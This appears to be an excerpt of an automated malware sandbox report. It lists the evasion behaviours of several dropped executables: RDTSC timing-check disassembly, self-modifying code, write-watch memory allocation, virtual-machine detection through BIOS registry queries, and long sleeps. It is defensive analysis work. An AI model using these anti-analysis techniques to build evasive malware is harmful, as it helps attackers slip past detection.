Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4F90C1F second address: 4F90C25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4F90C25 second address: 4F90CBA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 pushfd 0x00000006 jmp 00007F0D755569DBh 0x0000000b or eax, 7CD0CB3Eh 0x00000011 jmp 00007F0D755569E9h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F0D755569DCh 0x00000022 add si, 2838h 0x00000027 jmp 00007F0D755569DBh 0x0000002c popfd 0x0000002d pushfd 0x0000002e jmp 00007F0D755569E8h 0x00000033 sbb cl, FFFFFF98h 0x00000036 jmp 00007F0D755569DBh 0x0000003b popfd 0x0000003c popad 0x0000003d xchg eax, ebx 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F0D755569E5h 0x00000045 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4F90CBA second address: 4F90CCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D7555855Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4F90CCA second address: 4F90D2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F0D755569E3h 0x00000012 or esi, 3F69D56Eh 0x00000018 jmp 00007F0D755569E9h 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007F0D755569E0h 0x00000024 sbb ax, 78E8h 0x00000029 jmp 00007F0D755569DBh 0x0000002e popfd 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4F90D2D second address: 4F90D33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4F90D33 second address: 4F90D37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FA0A2B second address: 4FA0A81 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D75558569h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F0D75558567h 0x00000010 mov cx, 175Fh 0x00000014 popad 0x00000015 xchg eax, ebp 0x00000016 jmp 00007F0D75558562h 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FA0A81 second address: 4FA0A85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FA0A85 second address: 4FA0A8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 502069D second address: 50206A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 50206A3 second address: 50206A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 50206A7 second address: 50206AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 82A9F9 second address: 82A9FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 82ADC9 second address: 82ADCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 5010675 second address: 501067B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 501067B second address: 501067F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 501067F second address: 5010695 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0D7555855Bh 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 5010695 second address: 501069B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 501069B second address: 501069F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 501069F second address: 50106A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 50106A3 second address: 50106B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov al, 39h 0x0000000c mov bx, BDDCh 0x00000010 popad 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 50106B9 second address: 50106D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov dh, 85h 0x00000007 popad 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0D755569E1h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FB0278 second address: 4FB0282 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ebx, 0413528Eh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FB0282 second address: 4FB0291 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D755569DBh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FB0291 second address: 4FB02BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D75558569h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0D7555855Ch 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FB02BF second address: 4FB02C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FB02C5 second address: 4FB02C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FB02C9 second address: 4FB02E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0D755569E4h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 50109EE second address: 50109F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 50109F2 second address: 50109F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 50109F8 second address: 5010A07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D7555855Bh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 5010A07 second address: 5010A36 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D755569E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0D755569DDh 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 5010A36 second address: 5010A3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 5010A3C second address: 5010AA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D755569E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007F0D755569E6h 0x00000012 push dword ptr [ebp+0Ch] 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov si, di 0x0000001b pushfd 0x0000001c jmp 00007F0D755569E9h 0x00000021 xor ah, FFFFFFF6h 0x00000024 jmp 00007F0D755569E1h 0x00000029 popfd 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 5010AA6 second address: 5010ABE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 mov di, 667Eh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push dword ptr [ebp+08h] 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push ecx 0x00000013 pop edx 0x00000014 mov di, ax 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 5010ABE second address: 5010AC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 5010AC4 second address: 5010AC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 5010AC8 second address: 5010ADB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push DC8A490Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 5010ADB second address: 5010ADF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 5010ADF second address: 5010AE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 5010B60 second address: 5010B66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 5010B66 second address: 5010B6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 5010B6C second address: 5010B70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 5010B70 second address: 5010B99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D755569E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b movzx eax, al 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0D755569DDh 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 5010B99 second address: 5010BAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 push edx 0x00000007 pop ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov bh, 07h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe RDTSC instruction interceptor: First address: 978065 second address: 97807B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D755569E2h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe RDTSC instruction interceptor: First address: AF82CE second address: AF82D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe RDTSC instruction interceptor: First address: AF72CC second address: AF72F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F0D755569DEh 0x0000000b jmp 00007F0D755569E2h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe RDTSC instruction interceptor: First address: AF72F7 second address: AF72FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe RDTSC instruction interceptor: First address: AF72FB second address: AF730B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F0D755569D6h 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe RDTSC instruction interceptor: First address: AF730B second address: AF7311 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe RDTSC instruction interceptor: First address: AF7457 second address: AF7481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 popad 0x00000008 jnp 00007F0D755569FCh 0x0000000e push ecx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 jmp 00007F0D755569E4h 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe RDTSC instruction interceptor: First address: AF7481 second address: AF7485 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe RDTSC instruction interceptor: First address: AF78AC second address: AF78B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe RDTSC instruction interceptor: First address: AF7B2A second address: AF7B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edi 0x00000006 push edi 0x00000007 pop edi 0x00000008 jnc 00007F0D75558556h 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe RDTSC instruction interceptor: First address: AF7B3F second address: AF7B48 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Special instruction interceptor: First address: 67ED86 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Special instruction interceptor: First address: 821255 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Special instruction interceptor: First address: 81FCCE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Special instruction interceptor: First address: 67C582 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Special instruction interceptor: First address: 826705 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Special instruction interceptor: First address: 8AA845 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Special instruction interceptor: First address: 99ED86 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Special instruction interceptor: First address: B41255 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Special instruction interceptor: First address: B3FCCE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Special instruction interceptor: First address: 975256 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Special instruction interceptor: First address: 99C582 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Special instruction interceptor: First address: B46705 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Special instruction interceptor: First address: B9599A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Special instruction interceptor: First address: BCA845 instructions caused by: Self-modifying code
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Special instruction interceptor: First address: 895256 instructions caused by: Self-modifying code
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Special instruction interceptor: First address: AB599A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Special instruction interceptor: First address: A25256 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Special instruction interceptor: First address: C4599A instructions caused by: Self-modifying code
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Memory allocated: 2BD0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Memory allocated: 2C90000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Memory allocated: 4C90000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Memory allocated: 1180000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Memory allocated: 2CB0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Memory allocated: 2AB0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe Memory allocated: 11A0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe Memory allocated: 2CB0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe Memory allocated: 2AE0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Memory allocated: 1F3F4990000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Memory allocated: 1F3F62B0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 12B0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 2AB0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 4AB0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 7200000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 8200000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 8390000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 9390000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 97F0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: B070000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: C470000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 97B0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: D470000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: E470000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: EAA0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: FAA0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 8300000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 9500000 memory reserve | memory write watch
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Code function: 7_2_05010B4F rdtsc 7_2_05010B4F
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 599675
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 597269
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 596933
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 300000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 596417
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 596128
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 595880
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 595737
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 595611
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 595269
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 592613
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 592174
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 591863
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 591362
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 588551
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 587988
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 587538
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 587006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 586598
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 584013
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 583347
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 582588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 579810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 579036
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 578371
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 574082
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 573153
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 572475
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 571559
